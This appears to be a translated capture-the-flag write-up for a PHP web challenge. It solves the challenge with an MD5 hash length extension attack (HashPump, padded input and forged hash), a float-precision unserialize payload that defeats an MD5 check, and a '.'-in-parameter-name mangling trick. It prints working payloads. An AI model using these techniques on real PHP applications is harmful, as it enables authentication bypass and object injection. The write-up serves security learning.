Make a soy sauce.
Record some web questions, miscellaneous and other competition questions are also quite a lot online.
Since I didn't write it directly after the fight, the shooting range is now closed and cannot be reversed, so I modified the key value and changed the hash again. The topic remains the same.
Source code:
<?php
include("key.php");
class person{
public $aa;
public $bb;
public $username;
public $password;
public function __construct($key=''){
$this->username="jxsz";
$this->password="jxsz";
if(strlen($key)==16&&md5($key . urldecode( $this->username . $this->password)=="2c16349ea6a20496e05fb40e6c128b8b")){
echo "Welcome";
}
}
public function __destruct(){
$this->aa = (string)$this->aa;
if(strlen($this->aa) > 5 || strlen($this->bb) > 5||preg_match('/INF|NAN|M_/i', $this->aa)){
die("no no no");
}
if($this->aa !== $this->bb && md5($this->aa) === md5($this->bb) && $this->aa != $this->bb){
echo file_get_contents("/flag");
}
}
}
highlight_file(__FILE__);
$person=new person($key);
$other_pwd=$_POST["pwd1"];
$other_hash=$_POST["hash_code"];
if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
echo "66666666666";
unserialize($_GET['sz_sz.sz']);
}
Original question:
First, we need to meet the following conditions to enter the code segment:
if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
echo "66666666666";
unserialize($_GET['sz_sz.sz']);
}
In order to deserialize it, observe the code:
public function __construct($key=''){
$this->username="jxsz";
$this->password="jxsz";
if(strlen($key)==16&&md5($key . urldecode( $this->username . $this->password)=="2c16349ea6a20496e05fb40e6c128b8b")){
echo "Welcome";
}
}
It can be known that this can be bypassed through the hash length expansion attack.
Attack conditions for hash length expansion attacks:
When you know MD5(secret), you can easily calculate MD5(secret||padding||m') without knowing the secret, where m'is
any data, || is a connector, which can be empty . padding is the last padding byte of secret.
The padding byte of md5 contains the length of the entire message. Therefore, in order to accurately calculate the value of padding, we also need to know the length of the secret.
The following points can be summarized:
- Prepare a ciphertext and some data to construct a string, and use a hash function such as MD5 to generate a hash value (the so-called signature).
- Let the attacker submit data and hash value, but the attacker does not know the ciphertext.
- The server constructs the submitted data and the ciphertext into a string, and after hashing, judges whether it is equal to the submitted hash value.
Here you can directly use HashPumpthis tool to construct the hash length expansion attack payload:
github project address: https://github.com/bwall/HashPump
Since we have to bypass it strpos(urldecode($other_pwd),"szxy666")>0, we need to set the extended padding data to szxy666 to bypass it. Over.
d6659e29cc6a0878d07b19dd29a70ddc
jxsz\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00szxy666
Will be \xreplaced with %, and then passed in the parameters:
pwd1=jxsz%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00szxy666&hash_code=d6659e29cc6a0878d07b19dd29a70ddc
Successfully bypass the execution and output 66666666666.
Next, what we have to do is to deserialize and bypass the md5 comparison, and the comparison value is filtered above, the value length cannot be greater than 5, and the INF|NAN|M_bypass method such as filtering can still be bypassed here with high precision:
reference link: https ://www.cnblogs.com/phpper/p/7664069.html
serialization:
class person{
public $aa;
public $bb;
}
$float=new person();
$float->aa=0.8 * 7;
$float->bb=7 * 0.8;
var_dump(serialize($m));
?>
Construct the payload as follows:
O:6:"person":2:{
s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
However found unserialize($_GET['sz_sz.sz']);parameter names with special characters in there ., you can look at php character .filtering special characters such as: https://github.com/php/php-src/commit//fc4d462e947828fdbeac6020ac8f34704a218834?branch=fc4d462e947828fdbeac6020ac8f34704a218834&diff=unified
in Among them, we can clearly see that 空格或.或[PHP will replace it with _, and the code can see that the special character will only be replaced once.
We can use _the processing mechanism of special characters that will be replaced by , and will only be replaced once, by changing the parameter to sz[sz.sz, in this case, PHP will treat it [as a special character, and replace it with _, because of the replacement mechanism, so .It bypasses the filtering mechanism and is not replaced.
So we constructed the parameter name sz[sz.sz.
Pass the serialized directly:
O:6:"person":2:{
s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
payload:
?sz[sz.sz=O:6:"person":2:{
s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
Successfully got the flag.
flag{
hashparse+sz_sz.sz}